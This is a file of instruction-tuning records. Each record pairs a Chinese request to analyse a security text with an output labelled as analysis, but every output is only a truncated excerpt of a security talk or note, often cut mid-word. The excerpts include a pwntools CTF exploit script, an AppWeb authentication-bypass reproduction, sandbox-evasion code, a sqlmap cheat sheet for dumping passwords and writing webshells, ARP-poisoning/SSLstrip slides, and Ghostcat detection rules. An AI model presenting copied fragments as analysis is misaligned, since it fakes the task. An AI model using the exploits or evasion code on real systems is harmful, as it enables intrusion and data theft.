if(mem == MAP_FAILED) { err(1, \"mmap\"); } process(m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRESTing On Your Laurels Will Get You Pwned By Abraham Kang, Dinis Cruz, and Alvaro Munoz Goals and Main Point  Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.  Remember that a REST API is nothing more than a web application which follows a structured set of rules.  So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc.  We are going to show you how remote code execution and data filtration manifest themselves in REST APIs. Causes of REST Vulnerabilities  Location in the trusted network of your data center  History of REST Implementations  SSRF (Server Side Request Forgery) to Internal REST APIs  URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)  Self describing and predicable nature  Inbred Architecture  Extensions in REST frameworks that enhance development of REST functionality at the expense of security  Incorrect assumptions of application behavior  Input types and interfaces REST History  Introduced to the world in a PHD dissertation by Roy Fielding in 2000.  Promoted HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request.  GET http://svr.com/customers/123  PUT http://svr.com/customers/123 Http Method Database Operation PUT Update POST Insert GET Select DELETE Delete REST History (Bad Press)  When REST originally came out, it was harshly criticized by the security community as being inherently unsafe.  As a result REST, applications were originally developed to only run on internal networks (non- public access).  This allowed developers to develop REST APIs in a kind of Garden of Eden  This also encouraged REST to become a popular interface for internal backend systems.  Once developers got comfortable with REST internal applications they are now RESTifying all publi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFormat  Three parts in todays presentation.  Kernel auditing research.  A sample of exploitable bugs.  Kernel exploitation.  Pause for questions at completion of each section, but questions are welcome throughout. Part (i) Kernel Auditing Research. Kernel Auditing Overview  Manual Open Source Kernel Security Audit.  FreeBSD, NetBSD, OpenBSD and Linux operating systems.  Auditing for three months; July to September 2002. TimeFrame by Operating System  NetBSD  Less than one week.  FreeBSD  A week or less.  OpenBSD  A couple of days.  Linux  All free time. Prior Work  Dawson Engler and Stanford Bug Checker.  Many concurrency and synchronization bugs uncovered.  Linux Kernel Auditing Project? Presentation Notes  The use of the term bug is always in reference to a vulnerability unless otherwise stated.  At cessation of the auditing period, over one hundred vulnerabilities (bugs) were patched. Kernel Security Mythology (1)  Kernels are written by security experts and programming gods.  Therefore, having no [simplistic [security]] bugs. Kernel Security Mythology (2)  Kernels never have simplistic [security] bugs.  Therefore, only security experts or programming gods can find them. Kernel Security Mythology (3)  Kernels, if buggy, are difficult to exploit.  Therefore, exploitation is probably only theoretical in nature. Research Conjectures  Kernel Code is not special.  Its just another program.  Language Implementation bugs are present.  Its using languages with known pitfalls.  Kernel Programmers make mistakes.  Like everyone else. Auditing Methodology  Audit only simple classes of bugs.  Find entry points to audit.  Kernel / User memory copies based in idea on Dawson Englers bug checkers.  Audit using bottom-up techniques.  Targeted auditing evolved with experience. Auditing Experience  System Calls are simple entry points.  Device Drivers have simple entry points by design.  Unix; everything is a file.  IOCTLs are the swiss army knife of system calls, increasing the att", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBackdooring the Lottery and Other Security Tales from Gaming July 30, 2017 Gus Fritschie and Evan Teitelman Presentation Overview 1. Introductions 2. What has happened since 2011 3. Historical overview of security incidents in gaming 4. Eddie Tipton and the lottery 5. Russian slot attacks 6. Conclusion  SeNet International Corp. 2017 3 July 2017 SeNet Who We Are  SeNet International  SeNet International Corp. 2017 4 July 2017 SeNet Who We Are  Gus Fritschie Gus Fritschie has been involved in information security since 2000. About 5 years ago (after his previous DEF CON presentation on iGaming security) he transitioned a significant portion of his practice into the gaming sector. Since then he has established himself and SeNet as the IT security leader in gaming. He has supported a number of clients across the gaming spectrum from iGaming operators, land-based casinos, gaming manufacturer, lotteries, tribal gaming, and daily fantasy sports. @gfritschie  SeNet International Corp. 2017 5 July 2017 SeNet Who We Are  Evan Teitelman Evan works and lives in the Washington DC area. He is the founder and lead developer of BlackArch Linux and specializes in reverse engineering and secure application development. In his free time he enjoys hiking, climbing, and working on his van.  SeNet International Corp. 2017 6 July 2017 SeNet What this talk is and is not  SeNet International Corp. 2017 7 July 2017 SeNet What has happened since 2011  SeNet International Corp. 2017 8 July 2017 SeNet iGaming Legislation  SeNet International Corp. 2017 9 July 2017 SeNet Highlighted Security Incidents in Gaming Since 2011 None of these will be discussed in detail but are listed to illustrate that this sector is not immune to these threats. Only a small sampling.  Las Vegas Sands hack  NJ iGaming DDOS attacks  Affinity Gaming breach  Hard Rock Hotel & Casino data breach  Casino Rama Resort in Ontario  Peppermill Resort Spa Casino in Reno credit card breach  Weaknesses in Daily Fantasy Sports (DF", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python3 from pwn import * def exploit(connection): def recv_request(): request_id = u64(connection.recvn(8)) data = connection.recvn(0x20) return request_id, data def send_response(request_id, data): connection.send(p64(request_id)) if len(data) != 0x20: raise Exception connection.send(data) count = 0x10 requests = list() for _ in range(count): request_id, data = recv_request() requests.append((request_id, data)) first_va, _ = requests[0] second_va, _ = requests[1] if first_va - second_va != 0x40: raise NotImplementedError() # Write first fake `hash_rpc_context` structure to server heap buffer = BytesIO() buffer.write(b\"A\" * 8) buffer.write(p64(0x6861736822686f6d)) buffer.write(p64(2)) buffer.write(p64(0)) send_response(second_va, buffer.getvalue()) recv_request() # Write second fake `hash_rpc_context` structure to server heap buffer = BytesIO() buffer.write(b\"B\" * 8) buffer.write(p64(0x6861736822686f6d)) buffer.write(p64(2)) buffer.write(p64(first_va - count * 0x40 - 0x18)) send_response(second_va + 0x20, buffer.getvalue()) recv_request() # Zeroize `data_to_hash` send_response(first_va, b\"\\x00\" * 0x20) recv_request() # Trigger `hash_together_the_first_two` send_response(first_va, b\"C\" * 0x20) _, data = recv_request() info(\"flag = %s\", data.rstrip(b\"\\x00\")) context.log_level = \"debug\" with remote(\"35.230.128.35\", 1337) as connection: exploit(connection)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# AppWeb认证绕过漏洞CVE-2018-8715 AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server他使用C/C++来编写能够运行在几乎先进所有流行的操作系统上当然他最主要的应用场景还是为嵌入式设备提供Web Application容器 AppWeb可以进行认证配置其认证方式包括以下三种 - basic 传统HTTP基础认证 - digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态而不用再传递Authorization头 - form 表单认证 其7.0.3之前的版本中对于digest和form两种认证方式如果用户传入的密码为`null`也就是没有传递密码参数appweb将因为一个逻辑错误导致直接认证成功并返回session 参考链接 - https://ssd-disclosure.com/index.php/archives/3676 ## 漏洞环境 执行如下命令启动一个带有digest认证的Appweb 7.0.1服务器 ``` docker compose up -d ``` 访问`http://your-ip:8080`可见需要输入账号密码 ## 漏洞复现 利用该漏洞需要知道一个已存在的用户名当前环境下用户名为`admin` 构造头`Authorization: Digest username=admin`并发送如下数据包 ``` GET / HTTP/1.1 Host: example.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Authorization: Digest username=admin ``` 可见因为我们没有传入密码字段所以服务端出现错误直接返回了200且包含一个session ![](1.png) 设置这个session到浏览器即可正常访问需要认证的页面 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# uncompyle6 version 2.11.5 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.15rc1 (default, Apr 15 2018, 21:51:34) # [GCC 7.3.0] # Embedded file name: oceanOfSockets.py import requests import httplib import sys if len(sys.argv) < 2: sys.exit(0) host = sys.argv[1] port = sys.argv[2] def request1(): r = requests.get('http://{}/tmctf.html:{}'.format(host, port)) for data in r.iter_content(): if 'OceanOfSockets' not in data: r = requests.get('http://{}/index.html:{}'.format(host, port), headers={'content-type': 'text/html','user-agent': 'Edge/12'}) else: break def request2(): r = requests.get('http://{}/tmctf.html:{}'.format(host, port)) for data in r.iter_content(): if 'OceanOfSockets' not in data: r = requests.get('http://{}/index.html:{}'.format(host, port), headers={'content-type': 'text/html','user-agent': 'Edge/12'}) else: break def request3(): r = requests.get('http://{}/tmctf.html:{}'.format(host, port)) for data in r.iter_content(): if 'OceanOfSockets' not in data: r = requests.get('http://{}/index.html:{}'.format(host, port), headers={'content-type': 'text/html','user-agent': 'Edge/12'}) else: break def request3(): r = requests.get('http://{}/tmctf.html:{}'.format(host, port)) for data in r.iter_content(): if 'OceanOfSockets' not in data: r = requests.get('http://{}/index.html:{}'.format(host, port), headers={'content-type': 'text/html','user-agent': 'Edge/12'}) else: break def request3(): r = requests.get('http://{}/tmctf.html:{}'.format(host, port)) for data in r.iter_content(): if 'OceanOfSockets' not in data: r = requests.get('http://{}/index.html:{}'.format(host, port), headers={'content-type': 'text/html','user-agent': 'Edge/12'}) else: break def request3(): r = requests.get('http://{}/tmctf.html:{}'.format(host, port)) for data in r.iter_content(): if 'OceanOfSockets' not in data: r = requests.get('http://{}/index.html:{}'.format(host, port), headers={'content-type': 'text/html','user-agent': 'Edge/12'}) else: break def request3(): r = reque", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMusic Clash - I Fought the Law and the Law Won Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement Greg Conti gregory.conti@usma.edu Lisa Shay lisa.shay@usma.edu Woody Hartzog whartzog@samford.edu Disclaimer The views in this talk are the authors and dont reflect the official policy or position of the United States Military Academy, Samford University, the Department of the Army,the Department of Defense, or the United States Government. Why? http://www.nationalguard.mil/news/archives/2008/09/images/090808-secuirty_forces-full.jpg We don't want to live in a police state Meditation on the Law http://www.youtube.com/watch?v=1B-Ox0ZmVIU Driving the Speed Limit on the Atlanta Perimeter Three Points 1. Networked technologies have the potential to automate enforcement of the law. 2. Reckless and pervasive automation can have disastrous and unintended consequences. 3. This audience is in a unique position to defend society and appropriately confront law enforcement systems. Automated Law Enforcement Any computer-based system that uses input from unattended sensors to algorithmically determine that a crime has been or is about to be committed then takes some responsive action, such as to warn the subject or inform the appropriate law enforcement agency. Additionally, these systems will be capable of automatically imposing some form of punishment. Our proposed conceptualization of automated law enforcement is based on a model that is subject to automation at various points. The Precursors are in Place http://www.technologyreview.com/communications/37380/?mod=MagOur Increased Proliferation of Sensors Increased Diversity and Sensitivity of Sensors State Police Pull Over CT Medical Patient for Tripping Radioactivity Detector http://www.ctpost.com/default/article/Radioactive-man-Milford-resident-pulled-over-by-3549631.php#photo-2920568 Compulsory Sensing US Senate Passes Bill Requiring All New Cars in America to Come Equipped with a Black-box by 2015 h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity by Politics - Why it will never work Lukas Grunwald DN-Systems GmbH Germany DefCon 15  Las Vegas USA Agenda Motivation Some basics Brief overview ePassport (MRTD) Why cloning? How to attack the system BAC (Basic Access Control) EAC (Extended Access Control) Enrollment: Unexpected risks Motivation - MRTD This image is a work of a Federal Bureau of Investigation employee, taken or made during the course of an employee's official duties. As a work of the U.S. federal government, the image is in the public domain. The Governments Dream Multi biometric, double gates, anti Multi biometric, double gates, anti--tailgating, lightly tailgating, lightly-- supervised (to maintain non supervised (to maintain non--automated entry channels) automated entry channels) The Industrys Solution Government first asked Security Print Shops These are general and global print shops Extensive know-how in secure printing No know-how in IT security / cryptography Never done an IT security project Security Print Shops asked Smart Card Industry Focus on selling their products Advocates multi-purpose use Industry Ideas for the ePassport Multi-purpose use Identical design for national ID cards Use for electronic banking eGovernment Electronic signature Email encryption ID and travel / Passport Electronic payment Design Goals Use of cryptography / PKI Heavy use of biometrics 100% security against counterfeiting Improve facilitation Minimize time spent on legitimate travelers Segmentation of low-, high- risk travelers Minimize immigration time for traveler Design Approach Setting up a standards group at the ICAO Stuffed with printing experts Some crypto experts Only worked on algorithm level No one knows about implementation Driven by RFID manufactures No one looked at risks / design goals (KISS) Problems with Patents To store biometric data, typically a HASH is generated and stored (for fast comparison) Most of these HASHES are patented ICAO stores pictures of facial image JEPG or JEPG2000", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于沙箱逃避的一些 Tips: https://research.checkpoint.com/2022/invisible-cuckoo-cape-sandbox-evasion/ @Check Point 发布了关于沙箱逃避的一些分析这个公司听起来有点陌生知名项目 Evasion techniques就是它们出品 常见的一些规避沙箱技巧 汇编指令检测比如使用 cpuid 指令来获取处理器信息来区分沙箱 检测注册表项正常环境中没有但是特定的虚拟环境中存在 文件系统检测正常环境中没有但是特定的虚拟环境中存在 @Check Point 发现的一些新的规避沙箱的技巧 Windows API 函数调用中的漏网之鱼 沙箱为了检测关键的系统调用通常会将 ntdll.dll 中的 Native 函数进行 Hook 但是这些 Hook 并不是 完美的 Hook  比如 NtLoadKeyEx 函数 在 Windows Server 2003 中引入只有 4 个参数但是在Windows Vista 到 最新版本的 Windows 10中这个函数有着 8 个参数沙箱文中是 CAPE沙箱的 Hook 函数原型 仍 然按照 4 个参数进行处理 如果在沙箱中使用最新的系统则该函数一定会出现异常由于参数数量不对会导致堆栈不平衡 具体到代码中 沙箱没有对 Hook 函数的参数进行足够的检查 __try { _asm mov old_esp, esp NtLoadKeyEx(&TargetKey, &SourceFile, 0, 0, 0, KEY_ALL_ACCESS, &hKey, &ioStatus); _asm mov new_esp, esp _asm mov esp, old_esp if (old_esp != new_esp) printf(\"Sandbox detected!\"); //堆栈不平衡可以确认在沙箱中 } __except (EXCEPTION_EXECUTE_HANDLER) { printf(\"Sandbox detected!\"); } 1 2 3 4 5 6 7 8 9 10 11 12 13 __declspec(align(4)) BYTE aligned_bytes[sizeof(LARGE_INTEGER) * 2]; DWORD Timeout = 10000; //10 seconds PLARGE_INTEGER DelayInterval = (PLARGE_INTEGER)(aligned_bytes + 1); //unaligned //地址未对 齐 DelayInterval->QuadPart = Timeout * (-10000LL); if (NtDelayExecution(TRUE, DelayInterval) != STATUS_DATATYPE_MISALIGNMENT)// 沙箱仅保存了DelayInterval未返回正确的值 printf(\"Sandbox detected\"); 1 2 3 4 5 6 7 8 if (NtDelayExecution(FALSE, (PLARGE_INTEGER)0) != STATUS_ACCESS_VIOLATION) // 指针值故意给出无效的地址沙箱不会返回错误值 printf(\"Sandbox detected\"); 1 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" You can view this file with: .\\\" nroff -man [filename] .\\\" .TH svnserve.conf 5 .SH NAME svnserve.conf \\- snvserve 的仓库配置文件 .SH \"SYNOPSIS 总览\" .TP \\fIrepository-path\\fP\\fB/conf/svnserve.conf\\fP .SH \"DESCRIPTION 描述\" 每个代码仓库都有一个 \\fBsvnserve.conf\\fP 文件来控制 \\fBsvnserve\\fP 守护进程的行为这个文件位于仓库的 \\fBconf\\fP 子目录 .PP 文件的结构与 Subversion 用户配置文件的结构类似顶层是段落 (section)以方括号中的词指定每个段落之中是 ``variable=value'' 形式的变量定义以 `#' 开头的行被忽略\\fBsvnserve.conf\\fP 当前只使用一个段落称为 ``general''并且支持如下变量 .PP .TP 5 \\fBanon-access\\fP = \\fBnone\\fP|\\fBread\\fP|\\fBwrite\\fP 决定非授权用户的访问级别\\fBwrite\\fP 访问允许所有的仓库操作\\fBread\\fP 访问允许所有操作除了提交和修改版本属性\\fBnone\\fP 不允许任何访问默认级别是 \\fBread\\fP .PP .TP 5 \\fBauth-access\\fP = \\fBnone\\fP|\\fBread\\fP|\\fBwrite\\fP 决定授权用户的访问级别使用与上面相同的访问级别默认级别是 \\fBwrite\\fP .PP .TP 5 \\fBpassword-db\\fP = \\fIfilename\\fP 设置密码数据库的位置\\fIfilename\\fP 可能是相对仓库中 conf 目录的位置没有默认值密码数据库的格式与本文件相似它只有一个段落 ``users''段落中的每个变量是一个用户名每个值是一个密码 .PP .TP 5 \\fBrealm\\fP = \\fIrealm\\-name\\fP 设置仓库的授权域 (realm)如果两个仓库拥有相同的密码数据库它们应当在同一个域中反之亦然这样的关联可以允许客户端为多个仓库使用单一的密码缓存默认域的值是仓库的路径相对于服务器进程的虚根目录 .SH \"EXAMPLE 范例\" 下列范例 \\fBsvnserve.conf\\fP 允许认证用户的读访问禁止匿名用户的访问指向相同目录中的密码数据库定义了一个授权域名 .PP .nf [general] anon-access = none auth-access = read password-db = passwd realm = My First Repository .fi .PP ``passwd'' 文件可能是这样 .PP .nf [users] joeuser = joepassword jayrandom = randomjay .fi .SH \"SEE ALSO 参见\" .BR svnserve (8)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHijacking Web 2.0 Sites with SSLstrip Hands-on Training Contact  Sam Bowne  Computer Networking and Information Technology  City College San Francisco  Email: sbowne@ccsf.edu  Web: samsclass.info The Problem  HTTP Page with an HTTPS Logon Button Proxy Changes HTTPS to HTTP Target Using Facebook Attacker: Evil Proxy in the Middle To Internet HTTP HTTPS Ways to Get in the Middle Physical Insertion in a Wired Network Target Attacker To Internet Configuring Proxy Server in the Browser ARP Poisoning  Redirects Traffic at Layer 2  Sends a lot of false ARP packets on the LAN  Can be easily detected  DeCaffienateID by IronGeek  http://k78.sl.pt ARP Request and Reply  Client wants to find Gateway  ARP Request: Who has 192.168.2.1?  ARP Reply:  MAC: 00-30-bd-02-ed-7b has 192.168.2.1 Client Gateway Facebook.com ARP Request ARP Reply ARP Poisoning Client Gateway Facebook.com Attacker ARP Replies: I am the Gateway Traffic to Facebook Forwarded & Altered Traffic Demonstration Do it Yourself  You need a laptop with  Windows host OS  VMware Player or Workstation  Linux Virtual Machine (available on the USB Hard Drives in the room)  Follow the Handout", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProject The Interceptor Avoiding counter-drone systems with nanodrones David Melendez Cano R&D Embedded Software Engineer Introduction With massive drone industry growth, comes antidrone systems industry. Due to multiple and even classic vulnerabilities of communications now used by drones, antidrone industry can take down those drones using well documented attacks. State of the art Drone-antidrone competition is already put into scene, and we can look at the state-of-the-art from two points of view:  Anti-drone systems:  Detection:  Image/Thermal cameras, and radar  Flight plan  Motor noise signatures  Image recognition  Radio control and telemetry signature  Actions:  Radio protocol specific attacks (Deauth WiFi, etc)  Vendor sub-protocol specific attacks (Command injection/manipulation)  Radio jamming  GPS spoofing  Camera blinding  Capture with other aircraft  Drone countermeasures  Physical  Surrounding protection nets  Swarm attacks  Logical  Spread spectrum radio techniques  Inertial navigation with drift correction using image recognition (No GPS)  Use 3G/4G networks to control and telemetry The main point of this paper resides behind the fact that state-of-the-art antidrone mitigations claim they are effective, just because the frequency bands they use for control and telemetry are illegal to disturb: (3G/4G) This a reasonable point considering that many antidrone systems are managed, indeed, with 3G/4G links, but it has obvious limitations. New approach Using a communication system that claims to be secure and immune to jamming, because jamming it would be illegal, is simply not enough when we are talking about, for example, government/army equipment. Not to mention that you cannot fly if no 3G/4G coverage is available. Also, physical detection is key to antidrone systems, based mainly on the aircraft size and radar signature. This new approach offers three main points: Drone size: Small drones are more difficult to detect. If we can downsize the drone as ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1190-CVE-2020-1938漏洞利用检测 ## 来自ATT&CK的描述 使用软件数据或命令来利用面向Internet的计算机系统或程序中的弱点从而导致意外或无法预期的行为系统的弱点可能是错误故障或设计漏洞这些应用程序通常是网站但是可以包括数据库例如SQL标准服务例如SMB 或SSH以及具有Internet可访问开放的任何其他应用程序例如Web服务器和相关服务根据所利用的缺陷这可能包括利用防御防卫 如果应用程序托管在基于云的基础架构上则对其进行利用可能会导致基础实际应用受到损害这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径 对于网站和数据库OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞 ## CVE-2020-1938漏洞 2月20日国家信息安全漏洞共享平台CNVD发布了Apache Tomcat文件包含漏洞CNVD-2020-10487/CVE-2020-1938该漏洞是由于Tomcat AJP协议存在缺陷而导致攻击者利用该漏洞可通过构造特定参数读取服务器webapp下的任意文件若目标服务器同时存在文件上传功能攻击者可进一步实现远程代码执行目前厂商已发布新版本完成漏洞修复 ## 测试案例 具体复测可以参考 - Apache Tomcat文件包含漏洞 (CVE-2020-1938) 分析<https://www.secrss.com/articles/17267> ## 检测日志 HTTP流量 ## 测试复现 可参考上述测试案例 ## 测试留痕 HTTP流量检测规则基于payload关键词进行检测 ## 检测规则/思路 ### Suricata检测规则 ```yml # CNVD-2020-10487 CVE-2020-1938 alert tcp any any -> any 8009 (msg:\"CNVD-2020-10487 Ghostcat\"; content:\"javax|2e|servlet|2e|include|2e|request_uri\"; content:\"javax|2e|servlet|2e|include|2e|path_info\"; content:\"javax|2e|servlet|2e|include|2e|servlet_path\"; reference:url,www.anquanke.com/post/id/199351; classtype:tomcat; sid:202002211; rev:1;) ``` ### Bro检测规则 ```yml module EXPLOIT; event tcp_packet(c: connection, is_orig: bool, flags: string, seq: count, ack: count, len: count, payload: string) { if ( (c$id$resp_p == 8009/tcp) && /javax\\.servlet\\.include\\.request_uri/ in payload && /javax\\.servlet\\.include\\.path_info/ in payload && /javax\\.servlet\\.include\\.servlet_path/ in payload) { local rec: EXPLOIT::Info = [$ts=c$start_time, $src_ip=c$id$orig_h, $src_port=c$id$orig_p, $dst_ip=c$id$resp_h, $dst_port=c$id$resp_p, $vul_payload=payload, $vul_describe=\"CVE-2020-1938 Ghostcat\", $vul_refer=\"https://www.anquanke.com/post/id/199351\", $vul_level=\"high\"]; Log::write(EXPLOIT::LOG, rec); } ``` 检测规则转载自**<https://github.com/DaemonShao/CVE-2020-1938>** ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1190 <https://attack.mitre.org/techniques/T1190/> CVE-2020-1938检测规则 <https://github.com/DaemonShao/CVE-2020-1938>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroductions  Benjamin Caudill  Principal Consultant with Rhino Security Labs  Pentesting, Social Engineering, Webapp  ~4 Years in Security, 8+ Years in IT  Aerospace/Defense  Incident response, forensics (APT-centric)  Finance Industry  Webapp assessments  Consulting  Pentesting, Social Engineering  Number of certifications, but who cares? Overview  Traditional Forensics  Brief background  Offensive Forensics  Introduction/Basics  Memory  Potential, Problems  Disk/Registry  Potential, Problems  New Metasploit Module  Usage  Quick demo (Traditional) Digital Forensics the recovery and investigation of material found in digital devices  Related tools and concepts used for investigations (criminal/civil/corporate/etc)  Objective: Solve a crime  As a result, few forensics tools for pentesters Offensive Forensics The use of forensics techniques for offensive purposes (Often for improved social engineering, password cracking)  Why?  When traditional post-exploit techniques are insufficient for next steps  Pentesting has a time limit (cant wait all day keylogging)  Objective- Access to additional sensitive information  Explicit vs Implicit ! Forensic Comparison (Live/Dead Analysis) Offensive Forensics  Live Analysis   Access remotely and can grab memory, but permission prevent access to files  Hiberfil.sys, page.sys, other OS files, etc  Dead Analysis -  All files accessible (through disk image)  Loss of potential from user interaction/ live RAM Traditional Forensics  Live Analysis   Can grab memory, but things are changing (scary)  Legal concerns, chain of custody  Dead Analysis   System off  Stable  nothing is changing  Grab disk image Offensive Forensics - Memory  Windows Clipboard  Password Managers  copy/paste  Command-line History (doskey /history )  Adding users, FTP/Telnet sessions, etc  Passwords, Key Files, Encryption Keys (process_memdump in post MSF modules)  Password/Key cache (ie: Truecrypt)  Older software (ie: PuTTY)  Private Browsing/Sandboxing  Not quite", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Sqlmap <p align=\"center\"> <img src=\"../../../assets/img/logo/Sqlmap.png\" width=\"25%\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - https://github.com/sqlmapproject/sqlmap **文章 & Reference** - [Sqlmap使用教程[个人笔记精华整理] | 漏洞人生](http://www.vuln.cn/1992) - [sqlmap用户手册[续]](http://drops.xmd5.com/static/drops/tips-401.html) --- ## 基础使用 **检测注入** ```bash sqlmap -u URL -v 3 --random-agent # 判断注入 sqlmap -u URL -p id # 指定参数注入 sqlmap -u URL --cookie=\"xxxxx\" # 带 cookie 注入 sqlmap -u URL --batch # 不要请求用户输入,使用默认行为 sqlmap -r aaa.txt # post 型注入 sqlmap -u URL --flush-session # 清除缓存 sqlmap -u URL --os \"Windows\" # 指定操作系统 sqlmap -u URL --dbms mysql --level 3 # 指定数据库类型为 mysql,级别为 3(共 5 级,级别越高,检测越全面) sqlmap -u URL --dbms Microsoft SQL Server sqlmap -u URL --dbms mysql --risk 3 # 指定执行测试的风险(1-3, 默认 1) 1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加 OR 语句的 SQL 注入测试 sqlmap -u URL --proxy \"socks5://127.0.0.1:1080\" # 代理注入测试 sqlmap -u URL --batch --smart # 启发式判断注入 ``` **获取信息** ```bash sqlmap -u URL --current-db # 获取当前数据库 sqlmap -u URL --dbs # 枚举所有数据库 sqlmap -u URL -f # 检查 DBMS 版本 sqlmap -u URL --is-dba # 判断当前用户是否是 dba sqlmap -u URL --users # 列出数据库管理系统用户 sqlmap -u URL --privileges # 枚举 DBMS 用户权限 sqlmap -u URL --passwords # 获取当前数据库密码 sqlmap -u URL -D DATABASE --tables # 获取数据库表 sqlmap -u URL -D DATABASE -T TABLES --columns # 获取指定表的列名 sqlmap -u URL -D DATABASE -T TABLES -C COLUMNS --dump # 获取指定表的列名 sqlmap -u URL -dbms mysql -level 3 -D test -T admin -C \"username,password\" -dump # dump 出字段 username 与 password 中的数据 sqlmap -u URL --dump-all # 列出所有数据库,所有表内容 ``` **搜索字段** ```bash sqlmap -r \"c:\\tools\\request.txt\" -dbms mysql -D dedecms --search -C admin,password # 在 dedecms 数据库中搜索字段 admin 或者 password. ``` **读取与写入文件** 首先找需要网站的物理路径,其次需要有可写或可读权限. - -file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径) - -file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell) - -file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径 ```bash sqlmap -r aaa.txt --file-dest \"e:\\php\\htdocs\\dvwa\\inc\\include\\1.php\" --file-write \"f:\\webshell", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2007 McAfee, Inc.  2007 McAfee, Inc. Trojans  A Reality Check Looking at whats real Toralv Dirro EMEA Security Strategist, CISSP McAfee Avert Labs Dirk Kollberg Virus Research Lead McAfee Avert Labs  2007 McAfee, Inc. So when did all this start? 3 8/14/2007 History Lesson  Term coined by Ken Thompson in 1983  Used to gain privileged access to computers since the 80s  Keyloggers  Fake login screens  ...and to maintain access  Rootkits  Backdoors  or trivial trojans that just delete things http://www.acm.org/awards/article/a1983-thompson.pdf 4 8/14/2007 The Hype is started  Defcon 7.0: BO2K is released  Massive Media attention  The Hype is started 5 8/14/2007 Hype around Trojans  2001: Magic Lantern  Supposedly developed by the FBI to replace (hardware) keyloggers  2007: Der Bundestrojaner  Proposed by German authorities to enable online searches on suspects computers  >600.000 Google hits  Aprils Fool Joke around it by the CCC scares thousands  Estimated cost of development ~200.000 Euro [1] [1] Drucksache 16/3973 Deutscher Bundestag  2007 McAfee, Inc. And The Reality? 7 8/14/2007 Malware & Potentially Unwated Program Growth -5000 0 5000 10000 15000 20000 25000 30000 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 Virus Trojan Potentially Unwanted Program 8 8/14/2007 Samples sent to McAfee Research 2005 2006 Source: McAfees statistics Legacy is defined as: DOS, boot-sector, and Win3.1 viruses 12 3 25 Macro 7% Legacy 39% Trojans 23% PUPs 3% Script 9% Bots 12% Win 32 7% 22 3 31 Macro 5% Legacy 26% Trojans 31% PUPs 3% Script 7% Bots 22% Win 32 6% 60000 50000 40000 30000 20000 10000 0 2004 2005 2006 Bots Legacy Trojans Script Macro Win 32 PUPs 9 8/14/2007 1997 - 2006 Fastest Growing Trojan Types -2000 0 2000 4000 6000 8000 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 Password Stealer Downloader BackDoor 10 8/14/2007 2007: Q1 Password Stealing Trojan Targets PWS Variants Classified 0 100 200 300 400 500 600 700 Banker LegMir Lineage Gamania WoW LDPinch Zhengtu QQPa", "category": "text_analysis", "source": "security_papers"}
